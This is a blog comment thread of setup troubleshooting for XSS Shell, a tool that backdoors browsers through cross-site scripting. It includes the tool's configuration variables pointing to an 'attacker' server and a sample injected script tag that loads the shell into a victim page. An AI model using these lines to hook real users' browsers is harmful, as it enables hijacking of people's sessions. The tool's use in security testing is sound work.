XSS Shell, backdooring the web... - Yorumlar

Femisko

Femisko — Cum, 06 Haz 2008 17:27:52 +0200

I configured XSS Shell correctly.... But I dont seem to get the victims dropping in the Admin Panel. I get a yellow blink that is suppose to mean something... But I see nothing.... Help me please...

Andy

Andy — Per, 29 May 2008 18:30:42 +0200

My Virtual Directory "xssshell" points to C:\xssshell

There

\db\sample_victim\xssshellxssshell.asp

My xssshell.asp file has variables

// You XSSShell Server
var SERVER = "http://localhost/xssshell/";
// This file's name
var ME = SERVER + "xssshell.asp?p=1<%=VicAdd%>" ;
// Connector file (can be in php, cfm, pl etc. just stick with implementation)
var CONNECTOR = SERVER + "xssshell/connector.asp";
// Commands file (can be in php, cfm, pl etc. just stick with implementation)
var COMMANDS_URL = SERVER + "xssshell/commands.asp";

My C:\xssshell\xssshell\db.asp value is

'// DATABASE CONFIGURATION
Const DBPATH = "..\db\shell.mdb"

My C:\xssshell\sample_victim\default.asp value is

<script src="http://localhost/XssShell/xssshell.asp?v=336699"></script>

C:\xssshell\ and all sub directories are not read only

xssshell virtual directory and all sub directories are set to Write in IIS

I can load the admin interface OK, but when I accesshttp://localhost/XssShell/sample_victim/default.asp I get debugger

"An unhandled exception ('Operation must use an updateable query.') occurred in dllhost.exe [900].

in debug, it is failing on "ExeNewRs.Execute" with query INSERT INTO Victim (IP,VictimID) VALUES (127.0.0.1,308307)

n3

n3 — Çar, 01 Ağu 2007 20:22:43 +0200

M4D syshole.com da ufak bi döküman yazdim bu konula ilgili basit bi sey oldu ama kullanimi açikliyor biraz..
gerçi sitenin reklamini yapmis gibi oluyor biraz ama nasil olsa ferruh bey yorumlari onaylamadan önce okuyor
Eger ufak bi yardim olsun isterseniz yorumlar kismina da direkt yapistirabilirim dökümani...
Bu arada script olaganüstü olmus ferruh bey xss ataklarini yeniden canlandirabilecek tek seydi umarim gelismeler devam eder.

M4D

M4D — Paz, 13 May 2007 20:32:53 +0200

Hocam bunun Türkçe bi dökümanini hazirlar misiniz? xssshell.asp yi açmak istedigimde kodlar direk çikiyor karsima..Asp den de anlamadigim için çaresiz kaliyoruz.Ki çogu arkadas ta yapamamis benim gibi.daha açiklayici bi döküman hazirlayabilir misiniz?

Simdiden tesekkürler!!!

mark

mark — Çar, 18 Nis 2007 18:03:05 +0200

merhaba usta türkçe olarak daha genis bir kurulum bilgisi vere bilirmisin simdiden tesekkürler

executioner

executioner — Sal, 17 Nis 2007 22:26:42 +0200

aga ben bunu kuramadim çalismiyor hep editlerde eksik yada yanlisliklar çikiyor buna turkçe sekilde el atarmisiniz

Erkin

Erkin — Per, 12 Nis 2007 08:56:29 +0200

Harika biseye benziyor...
Hemen Asp Server kuruyorum:] Gercekten Professional olmus gibi...
kodlar bunu gosteriyor
gorusmek uzere paylasim icin saolun

lost

lost — Cmt, 24 Mar 2007 22:58:41 +0200

I am getting an error when running as the attacker. I am getting it's an IE and I couldn't figure out how to attach an fuction with event succesfully on my attacker page and on my iis server it brings up a debug message. any idea's? I am stuck

chintan

chintan — Pzt, 05 Mar 2007 13:38:38 +0200

Hey i have got one problem.... I have configured the xssshell well. Everything works fine..
But i am not being able to see the zombies dropping down in my admin interface.. I have replaced the desired url withhttp://localhost/xssshell/

Is it correct, or do i need to supply other url?? Kindly guide me..
I am not able to get why testing does not drop zombies in admin interface..

chintan

chintan — Pzt, 05 Mar 2007 12:17:38 +0200

Is there any link to english version of this site???

yeLda

yeLda — Pzt, 12 Şub 2007 14:47:03 +0200

eLLerinize sagLikdenemedim ama az sonra bakicam

nick

nick — Cum, 26 Oca 2007 18:28:07 +0200

Im guessing that u cant do this remotely?

JoSuEcUaTe

JoSuEcUaTe — Çar, 24 Oca 2007 00:01:44 +0200

# Tipo de error:
Microsoft JET Database Engine (0x80004005)
Error no especificado
/xss/xssshell/fmlibrary/fmlibraryv3.asp, línea 193

# Tipo de explorador:
Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1

# Página:
GET /xss/xssshell/Default.asp

JoSuEcUaTe

JoSuEcUaTe — Sal, 23 Oca 2007 22:37:00 +0200

I Have this errors:

Microsoft JET Database Engine (0x80004005)

/xss/xssshell/fmlibrary/fmlibraryv3.asp, line 193

todi

todi — Cmt, 20 Oca 2007 02:13:50 +0200

somebody cand help me help us make a video how to install if somebody can....

todi

todi — Cmt, 20 Oca 2007 00:27:51 +0200

yes i have the same problem like zidane i can see the files in the directory and not like in video demo

lobas

lobas — Cmt, 13 Oca 2007 15:18:55 +0200

hi i cannot get this to work, how do i setup the ms access stuff? can i not use flat file more info please the readme doesnt explain enough

zidane

zidane — Sal, 19 Ara 2006 18:31:28 +0200

Could some please tell me if ive done this right;
I download a web server program (netserve webserver), and i put all the xss shell file in to a directory, i changed the server url, when i go to 127.0.0.1:81/xssshell, it just lists all the files in the directory. It doesn't show the graphical interface like in the video. What am i doing wrong?

dan

dan — Çar, 06 Ara 2006 19:40:31 +0200

how do you make the DB file read/write? I always use apache, never used IIS before. Do I just right click the 'db' folder and uncheck read-only?

Sensor

Sensor — Sal, 05 Ara 2006 01:31:24 +0200

The script works on Windows XP Professional SP2? I've tried to make the sscript work but i don't received any ip. I have IIS installed on my Win Xp Professional.

k0b3.bryant08@gmail.com

k0b3.bryant08@gmail.com — Çar, 29 Kas 2006 20:05:43 +0200

maybe you are right, the folder name had confused me before, but i'd tried all possible configuration of setting up (even with your last comments).

perhaps there is some problem with my web server (iis5), and maybe i should try on linux platform during my free time.

this is first ever "simple" task that i fail to achive so far.

anyway, Ferruh, thanks for your patience and attentions ..

Ferruh Mavituna

Ferruh Mavituna — Çar, 29 Kas 2006 18:09:35 +0200

syntax error
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[w]http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

There shouldn't be syntax error in there possibly you are getting an error from ASP. Try to checkout full response from Firebug.

Ferruh Mavituna

Ferruh Mavituna — Çar, 29 Kas 2006 18:04:32 +0200

I don't know why it seems so complicated. Maybe because of xssshell folder name.

Put all files to webserver it's going to work changehttp://attacker/ to server address.

If you don't put into root then you just need change

SERVER

variable;

// You XSSShell Server
var SERVER = "http://attacker/";

Change to;

// You XSSShell Server
var SERVER = "http://attacker/YOURFOLDERNAME/";

k0b3.bryant08@gmail.com

k0b3.bryant08@gmail.com — Çar, 29 Kas 2006 16:30:18 +0200

i keep getting this error when i connect to the admin shell from victim's page:

syntax error
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

in the "headers.asp" page, can anyone helps ???

thanks in advance,

nofear0720

nofear0720 — Çar, 29 Kas 2006 14:18:55 +0200

i'm still not able to connect it correctly and when i test the sample_victim [http://localhost/xssshell/victim/], i got the following error :

[Exception... "Component returned failure code: 0x80040111 (NS_ERROR_NOT_AVAILABLE) [nsIXMLHttpRequest.status]" nsresult: "0x80040111 (NS_ERROR_NOT_AVAILABLE)" location: "JS frame ::http://nofear0720/xssshell/js/moo.ajax.js :: anonymous :: line 27" data: no]

i think my setting for xssshell.asp is no problem, but i still can't connect the the admin shell using the sample victim.

any help given will be appreicated.....

thanks in advance,

Ferruh Mavituna

Ferruh Mavituna — Çar, 29 Kas 2006 13:20:56 +0200

what make me confuse is that in the "xssshell.asp", under the variable "SERVER", i need to set it to, say i create a virtual server to the "xssshell" folder (not "xssshell" directory ...

If you mean "virtual directory" which, it's same and you can use it just like normal folder. So if you open xssshell virtual folder yes it will be translate intohttp://localhost/xssshell/xssshell.asp and your commands.asp will be inhttp://localhost/xssshell/xssshell/commands.asp

It should work well.

If you mean virtual host, this is invisible to application so it should just work again.

Second issue,

i got this error "$A is not defined" in prototype.js when accessing the xssshell.asp

Unfortunately this is one of the stupid errors from 3rd party AJAX libraries. Just ignore it. It shouldn't affect anything. But check for request responses in Firebug if there is an ASP error in there, that would be the reason.

nofear0720

nofear0720 — Çar, 29 Kas 2006 13:20:17 +0200

in "xssshell.asp" if i set the SERVER to the "http://myhost/xssshell/" where my xssshell:

xssshellv039----------
|
-----xssshell
|
-----db
|
-----sample_victim
|
-----xssshell.asp
then, by default the variables for CONNECTOR & COMMANDS_URL would be "http://myhost/xssshell/xssshell/connectors.asp" and "http://myhost/xssshell/xssshell/commands.asp". isn't it this is invalid url ??

i know i can set the variables for CONNECTOR & COMMANDS_URL by removing the prefix "xssshell", but anyone can explain how to set it correctly n wat value should i set for the SERVER assuming i setup the virtual server to "xssshell" folder and not the "xssshellv039" ???

i spend ald a day for setting up this, i can only see the XSS Shell admin but the testing victim always failed

thanks in advance,

Ferruh Mavituna

Ferruh Mavituna — Çar, 29 Kas 2006 13:16:44 +0200

Here are core variables. If you want you can just hardcode them instead of useing SERVER variable.

SERVER
Server is your xssshell URL which is goes likehttp://www.yoursite.com style

ME
xssshell.asp full URL. This should point to your xssshell.asp file.

CONNECTOR
This should point to your connector listener, connector.asp (by default connector is under xssshell folder)

COMMANDS_URL
This should point to your commands pusher, commands.asp (by default connector is under xssshell folder)

Çar, 29 Kas 2006 12:37:58 +0200

i got this error "$A is not defined" in prototype.js when accessing the xssshell.asp

regards,

Çar, 29 Kas 2006 12:35:58 +0200

what make me confuse is that in the "xssshell.asp", under the variable "SERVER", i need to set it to, say i create a virtual server to the "xssshell" folder (not "xssshell" directory that includes the "db", "sample_victim" folders ???), "http://myhost/xssshell", and the value for the variable "ME" is set by SERVER + "xssshell.asp?p=1<%=vicAdd%>" which give the value of ME as "http://myhost/xssshell/xssshell.asp?p=1<%=visAdd%>". How can the "xssshell.asp" exists in the "xssshell" folder or do we need to copy it to "xssshell" folder?? By default setting, same thing happens to the variables CONNECTOR and COMMANDS_URL which both have the value "http://myhost/xssshell/xssshell/connector.asp" and "http://myhost/xssshell/xssshell/commands.asp" respectively.

i still not able to set it correctly, anyone can help ??

thanks in advance,

Ferruh Mavituna

Ferruh Mavituna — Sal, 28 Kas 2006 19:01:34 +0200

Installition and Setup Checklist,

- Do steps in readme.txt to setup
- Check database permissions
- Check paths
- Check IP Addresses
- Server should support ASP
- ASP files are working by making requests to them from browser
- Don't use free webservers which are adding extra HTML code (this will break XSS Shell because of JS errors)
- Open DEBUG from xssshell.asp to see what's going on and what's the problem.

Still you got a problem?
- Install Firebug extension for Firefox and check repsonses for server-side errors and check Javascript errors.

You can send me these errors if you can't figure out.

Ferruh Mavituna

Ferruh Mavituna — Cum, 10 Kas 2006 10:11:50 +0200

Demo (they are lurking)
-http://ferruh.mavituna.com/xssshell/demo/
-http://ferruh.mavituna.com/xssshell/demo/wide/

Demo

Demo — Cum, 10 Kas 2006 07:49:26 +0200

Where did the great demo go to?!

Ferruh Mavituna

Ferruh Mavituna — Çar, 08 Kas 2006 12:28:56 +0200

Not xssshell.js should be http://attacker:81/xssshell.asp

help

help — Çar, 08 Kas 2006 11:16:10 +0200

in readme.txt :
Now open your admin interface from your browser,
To test it, just modify "sample_victim/default.asp" source code and replace "http://attacker:81/release/xssshell.js" URL with your own XSS Shell URL. Open "sample_victim" folder in some other browser and may be upload in to some other server.

q:
i can't see any "http://attacker:81/release/xssshell.js" in "sample_victim/default.asp" source code

Ferruh Mavituna

Ferruh Mavituna — Çar, 08 Kas 2006 10:08:35 +0200

In debug screen you should see a request to commands.asp. URL is correct? Db folder has write permissions? Copy that URL and try it, is it working? Should be related with that.

RE: xssshell

RE: xssshell — Sal, 07 Kas 2006 20:43:41 +0200

I downloaded it and set it up following the directions in the readme. The promblem I am having is that with debugging on I can see the client connect in the debugger but it never shows up in the admin panel as a victim.